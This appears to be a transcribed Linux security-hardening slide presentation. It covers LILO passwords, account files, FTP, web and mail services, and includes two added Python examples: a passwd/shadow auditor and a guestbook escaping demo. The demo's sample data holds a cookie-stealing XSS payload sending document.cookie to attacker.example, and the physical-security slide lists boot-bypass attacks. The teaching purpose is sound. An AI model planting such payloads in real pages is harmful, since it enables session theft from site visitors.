
Securing the Linux Operating System Erik P. Friebolin



  1. Securing the Linux Operating System Erik P. Friebolin

  2. Introduction
  • Security is not something that is achieved as a final end goal; it is not a finished state. Rather, it is a way of setting up, maintaining, and running an operating system, network, or environment.
  • It is a state of mind and a way of life. It depends on the day-to-day actions of the users and system administrators.
  • It also depends on the security not being so intrusive that it encourages users and administrators to "work around it".

  3. Security Breaches
  • Exposure
    • A form of possible loss or harm in a computing system.
  • Vulnerability
    • A weakness that might be exploited to cause loss or harm.
  • Threat
    • A circumstance that has the potential to cause loss or harm.

  4. Security Goals
  • Confidentiality
    • The assets of a computing system are accessible only by authorized parties.
  • Integrity
    • Assets can be modified only by authorized parties, and only in authorized ways.
  • Availability
    • Assets are accessible to authorized parties when they need them.

  5. Steps to Security
  • To decide how to secure your systems, you first need to decide how you intend to use them.
  • Decide what services a system is intended to use.
  • Decide what services a system is intended to provide locally.
  • Decide what services a system is intended to provide globally.
  • Develop a security policy based on the needs of the systems to be secured.

  6. Physical Security
  • Rebooting the system from other media such as floppy disk, CD-ROM, external SCSI drives and so on.
  • Removing the case and removing the BIOS battery to get around any BIOS restrictions.
  • Using a default BIOS password to gain access to the BIOS setup.
  • Rebooting the system and passing boot arguments to LILO (for example, booting into single-user mode or with init=/bin/sh).
  • Installing physical monitoring devices such as KeyGhost (a hardware keystroke logger).
  • Stealing the system's disk(s).
  • Unplugging the server or turning the power bar off (a very effective DoS); done several times, this can also lead to file system corruption.

  7. Console Security
  • LILO Security
  • Prevent an attacker at the console from booting into single-user mode (or supplying other boot arguments) without a password. In /etc/lilo.conf:

    boot=/dev/hda
    map=/boot/map
    install=/boot/boot.b
    prompt
    timeout=50
    message=/boot/message
    linear
    default=linux
    password=thisisapassword
    restricted

  8. Console Security (cont'd)

    image=/boot/vmlinuz-2.2.18
        label=linux
        read-only
        root=/dev/hda1
    image=/boot/vmlinuz-2.2.17
        label=linux-old
        read-only
        root=/dev/hda1

  • With restricted, the password is demanded only when boot parameters are typed at the LILO prompt; an unattended default boot still proceeds.
  • The password is stored in clear text, so lilo.conf must be readable by root only (chmod 600 /etc/lilo.conf).
  • Prevent changes to the lilo.conf file:
    • chattr +i /etc/lilo.conf
  • Remove the immutable flag (chattr -i) before editing, and run /sbin/lilo afterwards so the new configuration takes effect.

  9. Critical System Config Files
  • /etc directory - contains the majority of the system and application configuration files and many critical startup scripts.
  • /etc/passwd - one line per account: username, password field (normally "x" when shadow passwords are in use), user ID, primary group ID, comment, home directory and login shell. It is world-readable, so password hashes must not live here.
  • /etc/shadow - holds the username and hashed password pairs, as well as account information such as expiry date, password-ageing fields and any other special fields. Readable by root only.

  10. Critical System Config Files (cont'd)
  • /etc/group - contains all the group membership information, and optional items such as a group password.
  • /etc/gshadow - similar to the password shadow file; contains the groups, their passwords, administrators and members.
  • /etc/shells - contains the list of valid login shells.
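The files above are where most account-level mistakes show up: a second UID 0 account, an empty password field, a hash left in the world-readable passwd file, or an old DES hash that was never upgraded. The audit below is an added example, not part of the original presentation. It works on constructed sample text in the real passwd and shadow formats (the hashes are placeholders, not real credentials) so it runs without root; on a live system you would pass it the contents of /etc/passwd and /etc/shadow instead.

```python
"""Audit passwd/shadow style data for common account weaknesses.

Added example (not from the original presentation). The sample text below is
constructed in the real /etc/passwd and /etc/shadow formats; the hashes are
placeholders, not real credentials.
"""
from typing import Dict, List

# Constructed sample data. "toor" duplicates UID 0, "legacy" keeps its hash in
# the passwd file, "bob" still has a 13-character DES hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
toor:x:0:0:second uid 0:/root:/bin/bash
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
legacy:abJnggxhB/yWI:1002:1002:Old account:/home/legacy:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$1$saltsalt$PLACEHOLDERmd5hash0000:19000:0:99999:7:::
bin:*:19000:0:99999:7:::
toor::19000:0:99999:7:::
ftp:*:19000:0:99999:7:::
alice:$1$saltsalt$PLACEHOLDERmd5hash0001:19000:0:99999:7:::
bob:Npge08pfz4wuk:19000:0:99999:7:::
legacy:!$1$saltsalt$PLACEHOLDERlocked0002:19000:0:99999:7:::
"""


def parse_colon_file(text: str, nfields: int) -> Dict[str, List[str]]:
    """Split a colon-separated account file into {name: fields}.

    Malformed or duplicate lines are rejected rather than silently skipped:
    an attacker-planted line is exactly what an audit must not glide over.
    """
    records: Dict[str, List[str]] = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != nfields:
            raise ValueError(f"line {lineno}: expected {nfields} fields, got {len(fields)}")
        if fields[0] in records:
            raise ValueError(f"line {lineno}: duplicate entry for {fields[0]!r}")
        records[fields[0]] = fields
    return records


def audit_accounts(passwd_text: str, shadow_text: str) -> List[str]:
    """Return sorted, human-readable findings; an empty list means nothing was flagged."""
    passwd = parse_colon_file(passwd_text, 7)   # name:pw:uid:gid:gecos:home:shell
    shadow = parse_colon_file(shadow_text, 9)   # name:hash:lastchg:min:max:warn:inact:expire:reserved
    findings: List[str] = []

    for name, fields in passwd.items():
        pw_field, uid = fields[1], int(fields[2])
        if uid == 0 and name != "root":
            findings.append(f"{name}: UID 0 account other than root")
        if pw_field != "x":
            findings.append(f"{name}: hash stored in world-readable /etc/passwd, not in /etc/shadow")
        if name not in shadow:
            findings.append(f"{name}: no /etc/shadow entry")
            continue
        hashed = shadow[name][1]
        if hashed == "":
            findings.append(f"{name}: empty password field (login without a password)")
        elif hashed[0] in "!*":
            pass  # locked or disabled account: nothing to flag
        elif not hashed.startswith("$"):
            # No "$id$" prefix means traditional DES crypt (8 significant characters).
            findings.append(f"{name}: legacy DES crypt hash; enable MD5 (or stronger) hashing")

    for name in shadow.keys() - passwd.keys():
        findings.append(f"{name}: /etc/shadow entry with no matching /etc/passwd entry")

    return sorted(findings)


if __name__ == "__main__":
    for finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(finding)
```

Run against the sample data it reports four findings (bob's DES hash, legacy's hash in the passwd file, and two for toor). The shadow field is read conservatively: an empty field is flagged, a leading "!" or "*" is treated as locked, and anything without a "$id$" prefix is assumed to be DES.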

  11. File System Encryption
  • TCFS - kernel-level data encryption utility (http://www.tcfs.it)
  • BestCrypt - disk encryption program available for Windows and Linux (http://www.jetico.com)
  • PPDD - uses a partition which is encrypted and mounted using the PPDD driver (http://linux01.gwdg.de/~alatham/)

  12. FTP Services
  • If you are running anonymous FTP, watch permissions closely.
  • Never give anonymous FTP both read and write access to the same files or directories; a world-writable, world-readable drop box becomes a warez and malware exchange.
  • If you are not intentionally offering anonymous FTP, verify that anonymous logins are actually rejected rather than assuming so.

  13. Web Services
  • Do not install any example CGI scripts or applications you do not need.
  • Do not allow ordinary users to install arbitrary CGI scripts.
  • Do not allow unrestricted server-side includes.
  • Do not permit client-facing forms or chat systems to insert arbitrary HTML into web pages.
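The last bullet is the one most often got wrong: a guestbook or chat page that echoes a visitor's text straight into its markup lets that visitor run script in every other reader's browser. The example below is added here and is not from the presentation or any real guestbook product; it renders constructed sample entries the vulnerable way and the hardened way, then parses the result with the standard-library HTML parser to show which tags a browser would actually see.

```python
"""Unescaped versus escaped rendering of user-submitted text.

Added example, not from the original presentation. The guestbook entries are
constructed samples; the two render functions are illustrative templates.
"""
import html
from html.parser import HTMLParser
from typing import Iterable, List

# Constructed submissions: one benign, two that smuggle markup and script.
SAMPLE_ENTRIES: List[str] = [
    "Great talk, thanks!",
    '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>',
    '<img src=x onerror="alert(document.domain)">',
]


def render_unsafe(entries: Iterable[str]) -> str:
    """Vulnerable: entries are spliced into the page verbatim, so a visitor's
    text becomes part of the page's markup and executes for every reader."""
    return "<ul>" + "".join(f"<li>{e}</li>" for e in entries) + "</ul>"


def render_safe(entries: Iterable[str]) -> str:
    """Hardened: html.escape turns <, >, &, ' and " into entities, so the text is
    displayed exactly as typed but can never be parsed as a tag or attribute."""
    return "<ul>" + "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in entries) + "</ul>"


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def tags_in(fragment: str) -> List[str]:
    """All start tags in a fragment, as the standard-library parser sees them."""
    collector = _TagCollector()
    collector.feed(fragment)
    collector.close()
    return collector.tags


def foreign_tags(fragment: str) -> List[str]:
    """Tags in a rendered fragment other than the template's own <ul>/<li>.

    Anything listed here was contributed by a user, not by the template."""
    return [t for t in tags_in(fragment) if t not in ("ul", "li")]


if __name__ == "__main__":
    print("unsafe render contributes:", foreign_tags(render_unsafe(SAMPLE_ENTRIES)))
    print("safe render contributes:  ", foreign_tags(render_safe(SAMPLE_ENTRIES)))
```

Escaping is context-specific: html.escape is the right tool for text nodes and quoted attribute values, while data placed inside a URL, a script block or an unquoted attribute needs encoding appropriate to that context. If a site genuinely needs to accept some formatting, allowlist a small set of tags and attributes and escape everything else; never try to blocklist the dangerous ones.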

  14. E-Mail Services
  • If you are not providing remote access to mailbox accounts, make sure that POP and IMAP are not enabled.
  • If you are providing POP or IMAP access to mailbox accounts, consider switching to SSL/TLS-enabled versions of both clients and servers so passwords and mail do not cross the network in the clear.
  • Limit spam abuse by restricting mail relaying to your own users and networks; do not run an open relay.

  15. Operating Securely
  • Never operate routinely as root.
  • Do not use root, "super", or "sudo" in place of proper group permissions and membership.
  • Do not use a browser or chat program as root.
  • Do not allow or use easily guessable passwords.
  • Avoid HTML-enabled e-mail clients that execute active content.

  16. Security Tools/Enhancements
  • Use Secure Shell (ssh) for remote access instead of telnet and the r-commands.
  • Enable long passwords, MD5 hashing of passwords, and shadow password files.
  • Periodically run a vulnerability scanner (Internet Scanner or Nessus) against your own hosts.
  • Install an Intrusion Detection System (the Abacus project tools, for example). tcpdump captures traffic for analysis but is not an IDS by itself.
  • Enable the kernel firewall code and configure a rule set.

  17. Bastille Linux
  • Attempts to "harden" or "tighten" the Linux operating system.
  • Currently supports Red Hat and Mandrake systems (other versions coming soon).
  • http://www.bastille-linux.org/

  18. References
  • http://www.sans.org/linux.htm
  • http://www.seifried.org/lasg/
  • http://www.tldp.org/LDP/solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/
  • http://www.linuxsecurity.com/
  • http://www.tldp.org/HOWTO/Security-HOWTO/
